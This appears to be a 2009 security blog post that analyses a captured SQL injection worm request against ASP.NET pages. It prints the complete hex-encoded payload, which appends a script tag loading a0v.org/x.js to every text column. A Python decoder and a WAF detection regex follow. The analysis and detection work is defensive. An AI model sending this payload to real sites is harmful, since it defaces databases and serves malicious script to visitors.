Our web application firewall infrastructure has detected a new variant of the SQL injection worm, which now also attacks ASP.NET pages via Google.
The payload:
POST /Page.aspx?id=RNI;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005 \
200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000760 \
06100720063006800610072002800320035003500290020004400450043004C004100520045002000540061006 \
2006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730 \
065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006 \
F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C00750 \
06D006E00730020006200200077006800650072006500200061002E00690064003D0062002E006900640020006 \
1006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E0 \
0780074007900700065003D003900390020006F007200200062002E00780074007900700065003D00330035002 \
0006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E007800740 \
07900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F00430075007 \
20073006F00720020004600450054004300480020004E004500580054002000460052004F004D0020002000540 \
0610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C00400043002 \
0005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D00300 \
02900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B002 \
7002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D007200740 \
0720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002 \
B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0 \
068007400740070003A002F002F006100300076002E006F00720067002F0078002E006A0073003E003C002F007 \
300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460 \
052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002 \
000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0 \
043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C006 \
5005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.0
This is the SQL statement hex-encoded: because it is CAST to NVARCHAR, the bytes are UTF-16LE, which is why every character is followed by 00. Burp Suite has no problems with this :)
The only difference from the 2008 SQL injection worm is the script payload, which now links to a0v.org/x.js (do not visit!).
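As an added example (not part of the original post), here is a small Python script that does by hand what the Burp decoder does: it pulls the 0x... blob out of the request, decodes it the way SQL Server would (UTF-16LE for NVARCHAR, single-byte for the VARCHAR form the 2008 worm also used, which goes beyond the capture above), recovers the injected script URL, and flags requests with this DECLARE/CAST/EXEC shape. The query string is the one from the capture above with the line breaks removed; the function names are mine.

```python
import re
from urllib.parse import unquote

# Constructed sample: the hex blob from the captured request above, copied
# verbatim with the line-continuation backslashes removed.
WORM_HEX = (
    "4400450043004C0041005"
    "200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000760"
    "06100720063006800610072002800320035003500290020004400450043004C004100520045002000540061006"
    "2006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730"
    "065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006"
    "F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C00750"
    "06D006E00730020006200200077006800650072006500200061002E00690064003D0062002E006900640020006"
    "1006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E0"
    "0780074007900700065003D003900390020006F007200200062002E00780074007900700065003D00330035002"
    "0006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E007800740"
    "07900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F00430075007"
    "20073006F00720020004600450054004300480020004E004500580054002000460052004F004D0020002000540"
    "0610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C00400043002"
    "0005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D00300"
    "02900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B002"
    "7002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D007200740"
    "0720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002"
    "B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0"
    "068007400740070003A002F002F006100300076002E006F00720067002F0078002E006A0073003E003C002F007"
    "300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460"
    "052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002"
    "000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0"
    "043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C006"
    "5005F0043007500720073006F007200"
)

# Constructed sample: the URL-encoded query string of the captured POST.
WORM_QUERY = (
    "id=RNI;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + WORM_HEX
    + "%20AS%20NVARCHAR(4000));EXEC(@S);--"
)

# CAST(0x<hex> AS NVARCHAR(n)) or CAST(0x<hex> AS VARCHAR(n))
CAST_RE = re.compile(
    r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)\s*\(\d+\)\)", re.IGNORECASE
)
SCRIPT_RE = re.compile(r"<script\s+src=([^\s>]+)", re.IGNORECASE)
WORM_SHAPE_RE = re.compile(
    r"DECLARE\s+@\w+\s+N?VARCHAR\(\d+\).*CAST\(0x[0-9A-Fa-f]+\s+AS\s+N?VARCHAR\(\d+\)\).*EXEC\(@\w+\)",
    re.IGNORECASE | re.DOTALL,
)


def extract_cast_blob(query):
    """Return (hex_string, cast_type) from a URL-encoded query string, or None."""
    m = CAST_RE.search(unquote(query))
    if not m:
        return None
    return m.group(1), m.group(2).upper()


def decode_cast_blob(hex_string, cast_type):
    """Decode the hex as SQL Server does for that CAST target: NVARCHAR is
    UTF-16LE (two bytes per character, hence the 00 after every byte), while
    VARCHAR is a single-byte string."""
    raw = bytes.fromhex(hex_string)
    if cast_type == "NVARCHAR":
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def decode_payload(query):
    """Recover the SQL that EXEC(@S) would run, or None if there is no CAST blob."""
    blob = extract_cast_blob(query)
    if blob is None:
        return None
    return decode_cast_blob(*blob)


def injected_script_urls(sql):
    """List the src= targets of <script> tags the decoded SQL appends to columns."""
    return SCRIPT_RE.findall(sql)


def is_mass_injection(query):
    """Heuristic for this worm family: DECLARE @x N?VARCHAR ... CAST(0x... AS N?VARCHAR) ... EXEC(@x),
    independent of what the hex decodes to."""
    q = re.sub(r"\s+", " ", unquote(query))
    return bool(WORM_SHAPE_RE.search(q))


if __name__ == "__main__":
    sql = decode_payload(WORM_QUERY)
    print(sql)
    print("script URLs:", injected_script_urls(sql))
    print("worm shape:", is_mass_injection(WORM_QUERY))
```

Decoded, the statement is the familiar one: it opens a cursor over sysobjects/syscolumns for every user-table column of type ntext (xtype 99), text (35), nvarchar (231) or varchar (167) and runs an UPDATE that appends `<script src=http://a0v.org/x.js></script>` to each value, which is why a single successful request defaces every text field in the database. A WAF rule keyed on the `DECLARE @S ... CAST(0x ... AS NVARCHAR ... EXEC(@S)` shape catches the whole family; the hex itself changes with every campaign.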
Wednesday, July 29, 2009